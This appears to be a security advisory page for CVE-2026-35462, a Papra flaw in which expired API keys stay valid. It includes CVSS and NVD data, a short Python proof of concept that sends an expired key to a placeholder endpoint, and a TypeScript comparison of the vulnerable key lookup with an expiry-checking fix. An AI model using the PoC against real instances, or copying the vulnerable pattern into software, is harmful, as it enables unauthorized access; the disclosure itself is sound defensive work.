Security Vulnerability Report
CVE-2026-35462 CVSS 4.3 MEDIUM

Published: 2026-04-07 15:17:44
Last Modified: 2026-04-24 15:22:51

Description

Papra is a minimalistic document management and archiving platform. Prior to 26.4.0, API keys with an expiresAt date are never validated against the current time during authentication. Any API key — regardless of its expiration date — is accepted indefinitely, allowing a user whose key has expired to continue accessing all protected endpoints as if the key were still valid. This vulnerability is fixed in 26.4.0.
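The description names the defect class (CWE-613, insufficient session or credential expiration) without showing the missing check. As an added illustration, not Papra's code or the advisory's PoC, the following TypeScript contrasts an authentication path that only looks the key up with one that enforces `expiresAt`; the record shape, the in-memory store and all function names are hypothetical.

```typescript
// Hypothetical model of an API-key record that carries an optional expiry.
// Not Papra's actual schema; shapes and names are assumptions for this example.
interface ApiKeyRecord {
  id: string;
  userId: string;
  hash: string;             // hash of the presented secret; the store is keyed by it
  expiresAt: string | null; // ISO-8601 timestamp, or null for a non-expiring key
}

// Constructed sample store: one live key, one expired key, one non-expiring
// key and one whose expiry field is malformed.
const KEY_STORE: Record<string, ApiKeyRecord> = {
  "h-live":    { id: "k1", userId: "u1", hash: "h-live",    expiresAt: "2099-01-01T00:00:00Z" },
  "h-expired": { id: "k2", userId: "u1", hash: "h-expired", expiresAt: "2024-01-01T00:00:00Z" },
  "h-forever": { id: "k3", userId: "u2", hash: "h-forever", expiresAt: null },
  "h-garbage": { id: "k4", userId: "u2", hash: "h-garbage", expiresAt: "not-a-date" },
};

// The pattern the advisory describes: the key is found and accepted; expiresAt
// is stored but never consulted, so an expired key authenticates indefinitely.
function authenticateVulnerable(keyHash: string): string | null {
  const rec = KEY_STORE[keyHash];
  return rec ? rec.userId : null;
}

// Corrected check: a record is usable only if it has no expiry, or if the expiry
// parses and lies strictly in the future. A malformed expiresAt fails closed
// instead of silently behaving like "never expires".
function isExpired(rec: ApiKeyRecord, now: Date): boolean {
  if (rec.expiresAt === null) return false;
  const exp = Date.parse(rec.expiresAt); // NaN on malformed input
  if (Number.isNaN(exp)) return true;
  return exp <= now.getTime();
}

// Authentication with the expiry check applied at lookup time. `now` is a
// parameter so the behaviour is testable without relying on the wall clock.
function authenticateFixed(keyHash: string, now: Date = new Date()): string | null {
  const rec = KEY_STORE[keyHash];
  if (!rec || isExpired(rec, now)) return null;
  return rec.userId;
}
```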

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:papra:papra:*:*:*:*:*:*:*:* - VULNERABLE
Papra < 26.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL configuration
target_url = "https://target-papra-instance.com/api/documents"

# An expired API key (demonstration)
expired_api_key = "papra_key_expired_2024"

headers = {
    "Authorization": f"Bearer {expired_api_key}",
    "Content-Type": "application/json",
}

# Send request using the expired key
response = requests.get(target_url, headers=headers)

if response.status_code == 200:
    print("[+] Vulnerability Confirmed: Expired API key accepted.")
    print(f"[+] Response: {response.text}")
else:
    print("[-] Access Denied or Error.")
```

References

https://github.com/papra-hq/papra/security/advisories/GHSA-866c-mc22-wvv5 (Vendor Advisory, Exploit)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-35462",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-07T15:17:44.197",
    "lastModified": "2026-04-24T15:22:51.067",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Papra is a minimalistic document management and archiving platform. Prior to 26.4.0, API keys with an expiresAt date are never validated against the current time during authentication. Any API key — regardless of its expiration date — is accepted indefinitely, allowing a user whose key has expired to continue accessing all protected endpoints as if the key were still valid. This vulnerability is fixed in 26.4.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-613" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:papra:papra:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "26.4.0",
                "matchCriteriaId": "D2F10801-36E9-47AD-AD2D-DA4709B67B72"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/papra-hq/papra/security/advisories/GHSA-866c-mc22-wvv5",
        "source": "[email protected]",
        "tags": ["Vendor Advisory", "Exploit"]
      }
    ]
  }
}
```